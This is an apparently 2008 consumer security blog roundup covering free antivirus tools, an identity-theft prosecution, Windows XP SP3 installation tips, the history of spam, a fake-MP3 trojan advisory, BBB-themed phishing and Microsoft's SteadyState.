ADVANTAGES OF FREE SECURITY PRODUCTS
-- Free product offerings are better than having no protection at all (especially for folks on a tight budget)
-- There are actually many great free firewalls, AV products, and anti-spyware tools available (some free products are often as good or better than competing paid products - but you have to do your homework)
-- Sometimes a simple "no frills" solution is all you need and it might even offer better performance than a full featured product offering lots of "whistles and bells"
-- You can try adding a new layer of protection and if you find there's not a compelling need you can uninstall it and it hasn't cost you any money (e.g., if you rarely get spyware and wanted to test out a free product offering)


DISADVANTAGES  OF FREE SECURITY PRODUCTS
-- Security suites may cover more areas of exposure for improved protection (so there are no gaps)
-- Some free products may not be as comprehensive in their scope of protection when compared to paid products (e.g., AV protection may be limited to just files and may not cover exploits, rootkits, or other risks)
-- Some free security products may try to upsell folks with occasional popup messages to the more comprehensive paid versions
-- Very limited user support may be available, where full technical support may be available for
-- Most free products are only available for personal use and these must not be used on a free basis in a corporate environment


Below is an analysis of some of the most recent product offerings.  Both AVG and Avast have been well rated as basic AV products.  They often provide protection for leading edge threats more quickly than even some of the mainstream solutions.  

PC Magazine - Updated list of Free Security Software
http://blogs.pcmag.com/securitywatch/2008/05/free_security_software.php
http://www.pcmag.com/article2/0,1759,2304349,00.asp

QUOTE: Sometimes free security is worth what you pay for it. But if you know what to look for, you can get an excellent buy when it comes to protecting yourself—without dropping a lot of cash. You may be better off with a full-scale commercial Internet security product, but you're far better off with a free product than with no security product at all.  You may be surprised at how much protection you can get at no cost. The latest versions of the popular free antivirus products from avast! and AVG both now include spyware protection as well, and they're quite effective.

SPECIFIC PRODUCTS REVIEWED INCLUDE
==================================
avast! antivirus 4.8 Home Edition
AVG Anti-Virus Free 8.0
Spybot Search & Destroy 1.5
Spyware Terminator 2.0
ThreatFire 3.5

US Attorney seeks 5 years for the Bonnie and Clyde of ID theft

This is an interesting article, as the majority of the thefts were conducted using non-technical approaches. Folks should be careful in storing or discarding sensitive documents, as criminals will use any means to steal from others.

US Attorney seeks 5 years for the Bonnie and Clyde of ID theft
http://blogs.pcmag.com/securitywatch/2008/05/us_attorney_seeks_5_year_terms.php
http://www.philly.com/inquirer/home_top_left_story/20080513__Poster_children__for_ID_theft.html

QUOTE: While they used professional Internet tools to facilitate some of these thefts, the bulk of their identity theft was low-tech: "Purse snatching, burglarizing apartments and mailboxes with stolen keys, breaking into gym lockers, soliciting information over the telephone by false pretenses, picking up documents while visiting." With what they obtained they ran down others' credit cards, established new ones in the victims' names and ran those down, created accounts with banks and spent from those. They transferred a lot of money around to cover tracks.

The moral, other than that some people have no morals, is that online identity theft isn't the only way you can get ripped off. It may not even be the most likely way. Keep an eye on other vehicles, like what's in your mailbox or purse.

Windows XP SP3 - Read all prerequisites for a successful installation

The XP SP3 installation upgrades have worked well for me on three systems, and they should for most users. A service pack is a major upgrade of operating system or product binaries and should be applied cautiously.

Some best practices for a successful installation of XP SP3 (or any major software install) include:

-- Read the Internet Explorer prerequisite information (e.g., IE 6 and IE 8 users are affected -- IE 8 must be uninstalled first, and IE 6 users will return to IE 7 if they choose to uninstall XP SP3 later)
-- The "standalone" version for professionals is a huge download (312MB). I had 3 PCs to update, which made it beneficial to use the full version (plus I wanted to archive it as a future backup). For a single PC, the Windows Update facility provides a more efficient download, as it retrieves only the SP components needed for that PC's configuration.
-- Once you're ready to install, reboot your system for a fresh start
-- Shut down all applications that start automatically
-- Disable your anti-virus software
-- Optionally, temporarily disconnect home PCs from the Internet to avoid any potential interruptions (only if you're using the standalone version)
-- XP SP3 requires considerable disk space (1GB or more of free space). Make certain you have enough free temporary space. If your hard drive is almost full, use the Disk Cleanup tool and delete all unneeded items.
-- Start the XP SP3 install process and read/accept the various prompts offered
-- Do not use your system for any other activity while the install is running
-- Be patient, as the update process can take 30 to 60 minutes depending on system speed, free space, and other factors
-- Reboot your system when prompted
-- After the final settings have been applied following the reboot, I usually perform an additional reboot to test the change and give the PC a fresh start after the service pack.

It's important to read and research all prerequisites prior to installing. For example, as I'm currently testing Internet Explorer 8 beta, I discovered it must be uninstalled before you can apply the XP SP3 upgrade. After XP SP3 was installed, IE 8 was reinstalled.

Internet Explorer Prerequisites - A must read for XP SP3
http://blogs.msdn.com/ie/archive/2008/05/05/ie-and-xpsp3.aspx

Excellent resource for Windows XP SP3 links and information
http://www.wilderssecurity.com/showthread.php?t=208460

Microsoft Forums - XP SP3 issues can be reviewed or reported here:
http://forums.microsoft.com/TechNet/ShowForum.aspx?ForumID=2010&SiteID=17

Other XP SP3 Issues - A few systems have experienced constant reboot issues
http://msinfluentials.com/blogs/jesper/archive/2008/05/08/does-your-amd-based-computer-boot-after-installing-xp-sp3.aspx
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9084418

May 13, 2008 Update: The following blog entry provides an excellent overview of most current issues:

Shaun Cassells Blog - Some XP SP3 Users Experience Crashes, Mostly Due to OEM Problems
http://myitforum.com/cs2/blogs/scassells/archive/2008/05/12/some-xp-sp3-users-experience-crashes-mostly-due-to-oem-problems.aspx

QUOTE: While Windows XP is receiving some bad press due to the crashes, again, it appears that most of the crashes are due to hardware issues stemming from unsupported configurations, and thus the blame falls largely to the PC manufacturers, and the makers of component drivers. Fortunately, the majority of the problems have easy fixes that do not even require uninstalling the Service Pack.

Similar problems occurred with Windows Vista SP1, though in that case the blame ended up resting with a Microsoft pre-install update. It is fairly typical for a Service Pack to take some computers out of commission, particularly one for an OS with as large an operating base and as varied a hardware environment as Windows XP. Nonetheless, such problems are serious concerns for users affected, and those potentially at risk.

May 2008 - The 30th anniversary of SPAM email

Spam email started circulating 30 years ago. Below is a good overview from the updated version of Brad Templeton's 25th anniversary post. Spam remains a major problem with email today, and folks should take no action on it other than deleting it.

http://www.templetons.com/brad/spam/spam25.html

QUOTE: In fact, the earliest documented junk e-mailing I've uncovered was sent May 3, 1978 -- 25 years ago this month. (It was written May 1 but sent on May 3.) And in a surprising coincidence (*), just a month ago marked the 10th anniversary of March 31, 1993, the first time a USENET posting got named a spam.

The DEC marketer, Gary Thuerk, identified only as "THUERK at DEC-MARLBORO" (There were no dots or dot-coms in those days, and the at-sign was often spelled out) decided to send a notice to everybody on the ARPANET on the west coast. In those days there was a printed directory of everybody on the Arpanet which they used as source for the list. The message trumpeted an open house to show off new models of the Dec-20 computer, a foray into larger, almost mainframe-sized systems.

This was a spam, though the term would not be used to refer to it for another 15 years. Thuerk had his technical associate, early DEC employee Carl Gartley, send the message from his account after several edits. Alas, at first he didn't do it right. The Tops-20 mail program would only take 320 addresses, so all the other addresses overflowed into the body of the message. When they found that some customers hadn't got it, they re-sent to the rest.

More on the History and Types of SPAM
http://en.wikipedia.org/wiki/E-mail_spam

Avert Medium Threat Advisory -- Fake MP3 malware P2P attacks

While this is more applicable to home users, I haven't seen a threat rated as MEDIUM for a while. This one is apparently circulating extensively. It appears to affect folks participating on P2P networks, which always carry malware and copyright risks.

All users should avoid the site: fastmp3player (dot) com

Avert Medium Threat Advisory -- Fake MP3 malware attacks
http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3s-running-rampant/
http://www.avertlabs.com/research/blog/index.php/2008/05/07/yet-even-more-fake-media-files/
http://blastmagazine.com/2008/05/mcafee-identifies-downloader-uah-first-medium-risk-malware-in-three-years/
http://vil.nai.com/vil/content/v_144503.htm

QUOTE: Detection of a trojan named Downloader-UA.h was added to the McAfee DAT files several days ago. Since that time more than 360,000 McAfee VirusScan Online users have reported detections, a whopping 32% of those reporting in the past 24 hours alone. Now Downloader-UA.h is not your everyday trojan; this detection covers fake music and video files associated with *** MALICIOUS URL REMOVED ***

When a user attempts to load one of these MP3 and MPG files, they don't get the music/video they were hoping for; instead they're directed to download a file named PLAY_MP3.exe. In fact, the MP3/MPG file they downloaded was completely fake, playing no media clip whatsoever.

New Targeted Attacks - Appear to come from Better Business Bureau complaints

A new series of these continuing attacks has been sent to company executives. While the messages appear authentic, the BBB, government agencies, and banks never conduct official business via email (when in doubt, call the purported sender first to confirm the message is genuine).

BBB Case #947344536
http://www.f-secure.com/weblog/archives/00001431.html

QUOTE: We're seeing some new BBB trojan attacks going around. This attack method is well-known and has been occurring for months: A high-level executive inside an organization receives an e-mail that mentions a complaint supposedly made to the Better Business Bureau (USA). The e-mail appears to be credible and links to a site in order to download the complaint. The download claims to require IE and ActiveX in order to succeed. Once ActiveX is enabled, the site drops a backdoor on the system. This would be fairly convincing to most recipients, especially since the real company and individual names are used.

Example of the new email scam
http://www.f-secure.com/weblog/archives/bbb0.png

Windows XP - New SteadyState Facility

Microsoft recently introduced its new SteadyState facility, which captures all relevant configuration settings as of a specific point in time to create a "gold image" copy of the system. This facility can be helpful for libraries, colleges, and even certain work settings where a standardized, locked-down system image must be rolled out consistently to several workstations.

It may also be desirable for home users (especially where multiple accounts are used by different members of the family). It is also useful as a recovery method: when problems occur, users can bring back the complete "gold image" in a much more comprehensive manner than the System Restore function currently permits.

Windows XP - SteadyState Facility
http://isc.sans.org/diary.html?storyid=4367

QUOTE: Ever wish your Windows XP computer could return the way it was when it worked correctly? That would be great, right? We can all recall some point when a particular system worked just right. Enter a utility from Microsoft that does just that, and more than a 'System Restore'. It is called SteadyState and it can retain a golden image and revert to that state at will. It is designed to lock down shared computers that do not have a full time sysadmin, however it can be used in a number of scenarios. VMs are not always the environment of choice for malware researchers for example.

Microsoft Windows -- SteadyState Information
http://www.microsoft.com/windows/products/winfamily/sharedaccess/default.mspx
http://www.microsoft.com/windows/products/winfamily/sharedaccess/whatis/default.mspx

QUOTE: Windows SteadyState, successor to the Shared Computer Toolkit, is designed to make life easier for people who set up and maintain shared computers.

An easy way to manage multiple users -- You can manage whole groups of users as single user accounts. The new Windows SteadyState console makes it easier than ever to create and modify user profiles.

A locked-down platform for stable shared computing -- Not every computer user should have access to every software capability. Your system can be more stable and consistent when you limit user access to control panel functions, network resources, and other sensitive areas.

Set it and forget it -- Once you have everything set up the way you want it, you can share the computer and rest easy. Any changes a user might make to the configuration or hard disk can be undone by simply restarting the machine.
